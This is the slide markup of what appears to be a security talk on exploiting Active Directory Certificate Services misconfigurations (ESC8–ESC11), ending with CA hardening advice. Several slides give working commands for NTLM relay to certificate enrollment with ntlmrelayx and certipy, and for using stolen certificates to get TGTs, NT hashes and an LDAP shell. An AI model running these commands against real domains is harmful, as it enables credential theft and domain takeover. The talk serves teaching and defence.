        <p:nvSpPr>
          <p:cNvPr id="355" name="Google Shape;355;p3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latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>sudo certipy relay -ca CA_DOMAIN</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latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>python3 ntlmrelayx.py -t http://&lt;ca-server&gt;/certsrv/certfnsh.asp -smb2support --adcs --template TEMPLATE</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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/ExAndroidDev/impacket/tree/ntlmrelayx-adcs-attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t> (If the above is failing)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>https://github.com/bats3c/ADCSPwn</a:t>
            </a:r>
            <a:endParaRPr>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ESC9 - Reverted Patches</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="361" name="Google Shape;361;p3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62" name="Google Shape;362;p35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1593388" y="1521949"/>
            <a:ext cx="5957225" cy="3270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ESC9 - Exploitation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="368" name="Google Shape;368;p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69" name="Google Shape;369;p36"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="91163" l="0" r="34314" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1297500" y="1567550"/>
            <a:ext cx="6255276" cy="289350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="370" name="Google Shape;370;p36"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="77897" l="0" r="1253" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1297500" y="1994775"/>
            <a:ext cx="7151450" cy="220053"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="371" name="Google Shape;371;p36"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="81809" l="0" r="457" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1297500" y="2286650"/>
            <a:ext cx="7038901" cy="233366"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="372" name="Google Shape;372;p36"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="73368" l="0" r="1135" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1297500" y="2710325"/>
            <a:ext cx="7038901" cy="249217"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="373" name="Google Shape;373;p36"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1297500" y="3069100"/>
            <a:ext cx="7038901" cy="183011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ESC10 - SCHANNEL/KDC Binding</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="379" name="Google Shape;379;p3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80" name="Google Shape;380;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2374963" y="1132913"/>
            <a:ext cx="4394075" cy="3944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ESC10 - Exploitation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="386" name="Google Shape;386;p3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387" name="Google Shape;387;p38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1297500" y="1567550"/>
            <a:ext cx="6667500" cy="933450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="388" name="Google Shape;388;p38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1297500" y="2571738"/>
            <a:ext cx="6667500" cy="1781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ESC11 - Don’t let HTTP have all the fun</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="394" name="Google Shape;394;p3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latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>ntlmrelayx.py -t rpc://ca.corp.local -rpc-mode ICPR -icpr-ca-name &lt;CA&gt; -smb2support</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What is a Certificate and why it’s important</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="154" name="Google Shape;154;p4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="823225" y="1485050"/>
            <a:ext cx="5349000" cy="30762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Certificates allow something to authenticate itself </a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>HTTPS certificates or SSL/TLS communications use certificates to validate servers or clients</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>SSH Keys are a common Linux option to move to passwordless authentication</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>Windows introduced the full Certificate Authority functionality in Windows Server 2008</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>Primary usage we are interested in is Auth, can be for signing code, documents, servers etc.</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>Misconfigurations can let you go from Domain User to Domain Admin in 60 seconds</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="155" name="Google Shape;155;p4"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6109354" y="1312575"/>
            <a:ext cx="2840675" cy="342114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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3537150" y="1578400"/>
            <a:ext cx="5017500" cy="64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2400"/>
              <a:t>Helpful Hints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Certificate Formatting Tools</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="405" name="Google Shape;405;p4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OpenSSL Can be manually used to extract keys, certificates or modify the format i.e pem, key/cert into PFX or vice versa. (Google ‘change’ format you want to go from and to go to)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Certipy cert -pfx, -cert, or -key alongside the versions to either combine or split up keys.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Certi.py places a password on keys which may need to be removed when working with other formats.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What can I do with a cert?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="411" name="Google Shape;411;p4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certipy auth -pfx cert.pfx</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t>Rubeus accepts a cert if you’re working on windows.</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t>Both cases will generate use PKINIT to generate a TGT for you and attempt to obtain the NT Hash for the user or machine you’re authenticating as.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ONLY if NTAuthCertificates is enabled.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="412" name="Google Shape;412;p42"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5453520" y="1307850"/>
            <a:ext cx="3301376" cy="1219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What to do - LDAP/Shuffle</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="418" name="Google Shape;418;p4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certipy auth -pfx cert.pfx -ldap-shell</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t>PassTheCert</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/AlmondOffSec/PassTheCert/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://github.com/UriskLyErg/PassTheCert/tree/add_whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </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0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>BloodyAD </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://github.com/CravateRouge/bloodyAD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://github.com/CravateRouge/autobloody</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="419" name="Google Shape;419;p43"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="5302" l="0" r="60163" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5914900" y="1567550"/>
            <a:ext cx="2421499" cy="25163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Bloodhound</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="425" name="Google Shape;425;p4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Ly4k’s (Certipy Author) has added these features to Bloodhound as well as additional improvements while waiting for them to be made publicly available.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/ly4k/BloodHound/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>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1a30ba6456_0_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Defense</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1a30ba6456_0_1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Harden the CA</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="436" name="Google Shape;436;g21a30ba6456_0_1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Consider your CA’s as vital as a Domain Controller</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Keep them Patched</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Disable EDITF_ATTRIBUTESUBJECTALTNAME2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Require CA Certificate Manager Approval</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="437" name="Google Shape;437;g21a30ba6456_0_12"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5925200" y="1106713"/>
            <a:ext cx="2733951" cy="3832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1a30ba6456_0_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Harden the CA</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="443" name="Google Shape;443;g21a30ba6456_0_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Consider your CA’s as vital as a Domain Controller</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Keep them Patched</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Disable EDITF_ATTRIBUTESUBJECTALTNAME2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Require CA Certificate Manager Approval</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Restrict Enrolment Agents</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="444" name="Google Shape;444;g21a30ba6456_0_29"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5758075" y="1080339"/>
            <a:ext cx="2876325" cy="3885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g21a30ba6456_0_36"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5930989" y="885100"/>
            <a:ext cx="2862200" cy="3880825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="450" name="Google Shape;450;g21a30ba6456_0_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Harden the CA</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="451" name="Google Shape;451;g21a30ba6456_0_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Consider your CA’s as vital as a Domain Controller</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Keep them Patched</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
